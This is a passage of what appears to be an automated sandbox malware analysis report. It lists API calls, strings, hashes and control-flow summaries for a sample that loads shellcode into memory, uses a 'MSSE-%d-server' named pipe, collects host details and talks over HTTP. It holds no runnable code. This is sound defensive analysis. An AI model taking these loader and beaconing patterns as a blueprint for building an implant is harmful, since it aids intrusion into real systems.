                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                    • String ID: 0PE$@6E$DCE
                    • API String ID: 649803965-2430247936
                    • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                    • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                    • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                    • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

                    Control-flow Graph

                    APIs
                    • _snprintf.LIBCMT ref: 0066E725
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                      • Part of subcall function 00677B38: _snprintf.LIBCMT ref: 00677CA5
                    • _snprintf.LIBCMT ref: 0066E7BD
                    • _snprintf.LIBCMT ref: 0066E7D4
                    • HttpOpenRequestA.WININET ref: 0066E818
                    • HttpSendRequestA.WININET ref: 0066E84A
                    • InternetQueryDataAvailable.WININET ref: 0066E87A
                    • InternetCloseHandle.WININET ref: 0066E898
                      • Part of subcall function 00672D70: strchr.LIBCMT ref: 00672DD6
                      • Part of subcall function 00672D70: _snprintf.LIBCMT ref: 00672E0C
                      • Part of subcall function 00672C0C: strchr.LIBCMT ref: 00672C69
                      • Part of subcall function 00672C0C: _snprintf.LIBCMT ref: 00672CB3
                    • InternetReadFile.WININET ref: 0066E8D4
                    • InternetCloseHandle.WININET ref: 0066E8F5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                    • String ID: %s%s$*/*
                    • API String ID: 3536628738-856325523
                    • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                    • Instruction ID: d172ce45b955779f0415644ddcf92c05ff9dd92b9507bddcc31c82f88435206d
                    • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                    • Instruction Fuzzy Hash: 7B61D236700B8186EB50DF65E4507AEB7A7F785B98F40412AEE4D57B58DF39C50AC700

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                    • String ID: %s%s%s
                    • API String ID: 1671524875-1891519693
                    • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                    • Instruction ID: c28a7dd79399c0947703d9ca336236560d4538fccad7daf3844f32ce664af0b6
                    • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                    • Instruction Fuzzy Hash: 2241D23470468146EA44FB22E92472E779BBB85FD0F848129FE5A0BF55CF3DC1528748

                    Control-flow Graph

                    APIs
                    • CryptAcquireContextA.ADVAPI32 ref: 006611B8
                    • CryptAcquireContextA.ADVAPI32 ref: 006611DC
                    • CryptGenRandom.ADVAPI32 ref: 006611F0
                    • CryptReleaseContext.ADVAPI32 ref: 00661204
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$Acquire$RandomRelease
                    • String ID: ($Microsoft Base Cryptographic Provider v1.0
                    • API String ID: 685801729-4046902070
                    • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                    • Instruction ID: f528ba85227e950b9a5ff7247e49097112dbfb7c3d4fe532c91b4787bb7a5fda
                    • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                    • Instruction Fuzzy Hash: D901D83570074182E710CF65E898359B767F7D8F88F488025D74987B24CF79C699C740

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                    • String ID:
                    • API String ID: 2239253087-0
                    • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                    • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                    • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                    • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

                    Control-flow Graph

                    APIs
                    • malloc.MSVCRT ref: 004017B9
                    • SleepEx.KERNELBASE ref: 004017CD
                      • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                      • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                      • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                    • GetTickCount.KERNEL32 ref: 004017FC
                    • CreateThread.KERNEL32 ref: 00401885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                    • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                    • API String ID: 3660650057-1020837823
                    • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                    • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                    • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                    • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0067E0FC: RevertToSelf.ADVAPI32 ref: 0067E10A
                    • InternetOpenA.WININET ref: 0066EB0C
                    • InternetSetOptionA.WININET ref: 0066EB2C
                    • InternetSetOptionA.WININET ref: 0066EB44
                    • InternetConnectA.WININET ref: 0066EB7A
                    • InternetSetOptionA.WININET ref: 0066EBB7
                    • InternetSetOptionA.WININET ref: 0066EBE2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$Option$ConnectOpenRevertSelf
                    • String ID:
                    • API String ID: 1513466045-0
                    • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                    • Instruction ID: a3c04ec4af3ea140744b9b6893a1626f6dc64dd5709c99981c3f251268a58bfe
                    • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                    • Instruction Fuzzy Hash: BD412935300B8182EB54EF51F4A57A977A3F789B88F148019DA4A17B1ADF3EC426CB04

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                    • malloc.LIBCMT ref: 0066CB3B
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0067C230: _time64.LIBCMT ref: 0067C254
                      • Part of subcall function 0067C230: malloc.LIBCMT ref: 0067C29C
                      • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C300
                      • Part of subcall function 0067C230: strtok.LIBCMT ref: 0067C311
                      • Part of subcall function 006734A0: _time64.LIBCMT ref: 006734AE
                      • Part of subcall function 0067EAA8: malloc.LIBCMT ref: 0067EAF8
                      • Part of subcall function 0067EAA8: realloc.LIBCMT ref: 0067EB07
                      • Part of subcall function 0066F3C0: GetLocalTime.KERNEL32 ref: 0066F3DF
                    • malloc.LIBCMT ref: 0066CC4A
                    • _snprintf.LIBCMT ref: 0066CCC1
                    • _snprintf.LIBCMT ref: 0066CCE7
                    • free.LIBCMT ref: 0066CEC6
                      • Part of subcall function 0067AD44: malloc.LIBCMT ref: 0067AD78
                      • Part of subcall function 0067AD44: free.LIBCMT ref: 0067AF2F
                      • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E3D
                      • Part of subcall function 00678E0C: htonl.WS2_32 ref: 00678E4A
                    • _snprintf.LIBCMT ref: 0066CD0E
                      • Part of subcall function 0067DA74: Sleep.KERNEL32 ref: 0067DABC
                      • Part of subcall function 0067DA74: ExitThread.KERNEL32 ref: 0067DAC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                    • String ID:
                    • API String ID: 548016584-0
                    • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                    • Instruction ID: 16eebcad59399b91420e8f2b6aaa84d72e3de6bc391615428ee9825792860063
                    • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                    • Instruction Fuzzy Hash: 71A1E17130068146DB98FB72E8657AE23A3BF85790F44913DAE5E4B75ADF39C805C708

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 406 66f014-66f04f call 66f118 call 692660 411 66f051-66f053 406->411 412 66f058-66f097 WSAIoctl 406->412 413 66f0f6-66f10a 411->413 414 66f0b4-66f0be 412->414 415 66f099-66f0b0 412->415 416 66f0c0 414->416 417 66f0eb-66f0ee call 6925e8 414->417 415->414 419 66f0c5-66f0cf 416->419 420 66f0f4 417->420 421 66f0d6-66f0e2 419->421 422 66f0d1-66f0d4 419->422 420->413 421->417 424 66f0e4 421->424 422->421 423 66f0e6 422->423 423->417 424->419
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: IoctlSocketStartupclosesocket
                    • String ID:
                    • API String ID: 365704328-0
                    • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                    • Instruction ID: 2237a941fd2ae6f7b750c7a65c64ae29eca4d48651673b50a0ea1dd646ee54ff
                    • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                    • Instruction Fuzzy Hash: 72219D727087C083D7208F24F5A075AB7A6F3887E4F648635EE9D43B8ADB39C5568B00

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 425 401595-4015c5 VirtualAlloc 426 4015c7-4015c9 425->426 427 4015e0-40162c call 401563 VirtualProtect CreateThread 426->427 428 4015cb-4015de 426->428 428->426
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: Virtual$AllocCreateProtectThread
                    • String ID:
                    • API String ID: 3039780055-0
                    • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                    • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
                    • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
                    • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 431 401704-40175c CreateFileA 432 40179c-4017a5 431->432 433 40175e-401760 431->433 434 401781-40178f CloseHandle 433->434 435 401762-40177f ReadFile 433->435 434->432 435->434 436 401791-40179a 435->436 436->433
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleRead
                    • String ID:
                    • API String ID: 1035965006-0
                    • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                    • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
                    • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
                    • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 437 66f118-66f12a 438 66f14e-66f150 437->438 439 66f12c-66f136 call 6925e0 437->439 441 66f152-66f159 438->441 442 66f1c9-66f1d1 438->442 444 66f13c-66f13e 439->444 441->442 443 66f15b-66f1c2 call 67b434 * 2 call 67b454 * 4 441->443 443->442 446 66f144 444->446 447 66f1d2-66f1e3 call 6925d8 call 680414 444->447 446->438
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CleanupStartup
                    • String ID:
                    • API String ID: 915672949-0
                    • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                    • Instruction ID: e884fee1bb4c98631f262bdf6907ae2d834792547d9a64c214e260f98231aede
                    • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                    • Instruction Fuzzy Hash: B2112D70601B42C6FB24AB60F86936432DBEB46344F50043D97194B3ABDF7E85A9CB15

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 463 1b96b4-1b971e 464 1b9723-1b972c 463->464 465 1b994f-1b9963 464->465 466 1b9732-1b97b6 call 1b8b64 LoadLibraryA 464->466 469 1b97bb-1b97c4 466->469 470 1b97ca-1b97d0 469->470 471 1b993c-1b994a 469->471 472 1b98a9-1b9910 call 1b8b64 470->472 473 1b97d6-1b97ee 470->473 471->464 477 1b9913-1b9927 472->477 473->472 474 1b97f4-1b98a7 473->474 474->477 478 1b9929-1b9932 477->478 479 1b9937 477->479 478->479 479->469
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                    • Instruction ID: efd88f1dba25db5d1f0e43baab4af7ca16a4ccce529ffc94f2ae934aebaebbcd
                    • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                    • Instruction Fuzzy Hash: 7E619936219B8486CAA4CB1AE49035AB7A4F7C9B98F544125EFCE83B28DF3DD555CB00

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 481 403040-403051 call 401950 call 4017f8 486 403058-40305f SleepEx 481->486 486->486
                    APIs
                      • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                      • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                      • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                      • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                    • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: Sleep$CountCreateThreadTickmalloc
                    • String ID:
                    • API String ID: 345437100-0
                    • Opcode ID: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                    • Instruction ID: 6421346cc2233eacca5f16f640383cf641c739f700fbc6dff330eaabfecbeef7
                    • Opcode Fuzzy Hash: 425a1bfd6dc76289f59e140baf5a553519d4dbae3435d8d7a7e3de4f13007a03
                    • Instruction Fuzzy Hash: EEC02B5430104440DB0833F3442733D06180B08388F0C043FFE0B322D28C3CC050030E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 487 1b9324-1b9358 488 1b935e-1b9374 487->488 489 1b944d-1b9453 487->489 488->489 493 1b937a-1b93c2 488->493 490 1b9479-1b9482 489->490 491 1b9455-1b9474 VirtualAlloc 489->491 491->490 495 1b93ce-1b93d4 493->495 496 1b9402-1b9408 495->496 497 1b93d6-1b93de 495->497 496->489 498 1b940a-1b9445 496->498 497->496 499 1b93e0-1b93e6 497->499 498->489 499->496 500 1b93e8-1b9400 499->500 500->495
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                    • Instruction ID: f8e345c21f6f9c9e839c43a71cb4834d3fbaf0f1daad40beabb24e80c0c04f1e
                    • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                    • Instruction Fuzzy Hash: 12419772628B8487DB64CB1AE48471AB7A1F7C8B94F105225FBDE87B68DB3CD4518F00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                    • String ID: U
                    • API String ID: 3902385426-4171548499
                    • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                    • Instruction ID: ec14a26c44d62a4c083659281745be02a7e1ba2226b7defda2d8e2cb297eb1e3
                    • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                    • Instruction Fuzzy Hash: 9902357231468186DB20EF28E4843AEB767F785B48F540216FB8987B58DF3EC956CB11
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00678FA0
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00678FD9
                    • Process32First.KERNEL32 ref: 00678FFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                    • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                    • API String ID: 718051232-1833344708
                    • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                    • Instruction ID: 752ecabde62a66407af9c842d5c33e994ba71729f6791cc7c402b3997ffc8998
                    • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                    • Instruction Fuzzy Hash: A8726D21B44641C6DB68DB2698583B913D3B789BC0FA4C126DE0F87B59EE39CD87CB41
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682FFD
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 00683002
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _fileno.LIBCMT ref: 0068302F
                      • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                      • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                    • write_multi_char.LIBCMT ref: 0068366B
                    • write_string.LIBCMT ref: 00683688
                    • write_multi_char.LIBCMT ref: 006836A5
                    • write_string.LIBCMT ref: 00683704
                    • write_string.LIBCMT ref: 0068373B
                    • write_multi_char.LIBCMT ref: 0068375D
                    • free.LIBCMT ref: 00683771
                    • _isleadbyte_l.LIBCMT ref: 00683842
                    • write_char.LIBCMT ref: 00683858
                    • write_char.LIBCMT ref: 00683879
                    • _errno.LIBCMT ref: 0068397C
                    • _invalid_parameter_noinfo.LIBCMT ref: 00683987
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID: $@
                    • API String ID: 3318157856-1077428164
                    • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                    • Instruction ID: 553c916e11350bd172c27715927b5fa2c9722ca7020bfaf0cce802a564827fec
                    • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                    • Instruction Fuzzy Hash: D34244B26086A486EB25EF19D5543BE6BB3F741F90F140305DE4A17B98EB79CB41CB01
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00682589
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068258E
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _fileno.LIBCMT ref: 006825BB
                      • Part of subcall function 00685A54: _errno.LIBCMT ref: 00685A5D
                      • Part of subcall function 00685A54: _invalid_parameter_noinfo.LIBCMT ref: 00685A68
                    • write_multi_char.LIBCMT ref: 00682BEB
                    • write_string.LIBCMT ref: 00682C08
                    • write_multi_char.LIBCMT ref: 00682C25
                    • write_string.LIBCMT ref: 00682C84
                    • write_string.LIBCMT ref: 00682CBB
                    • write_multi_char.LIBCMT ref: 00682CDD
                    • free.LIBCMT ref: 00682CF1
                    • _isleadbyte_l.LIBCMT ref: 00682DC2
                    • write_char.LIBCMT ref: 00682DD8
                    • write_char.LIBCMT ref: 00682DF9
                    • _errno.LIBCMT ref: 00682EF3
                    • _invalid_parameter_noinfo.LIBCMT ref: 00682EFE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                    • String ID:
                    • API String ID: 3318157856-3916222277
                    • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
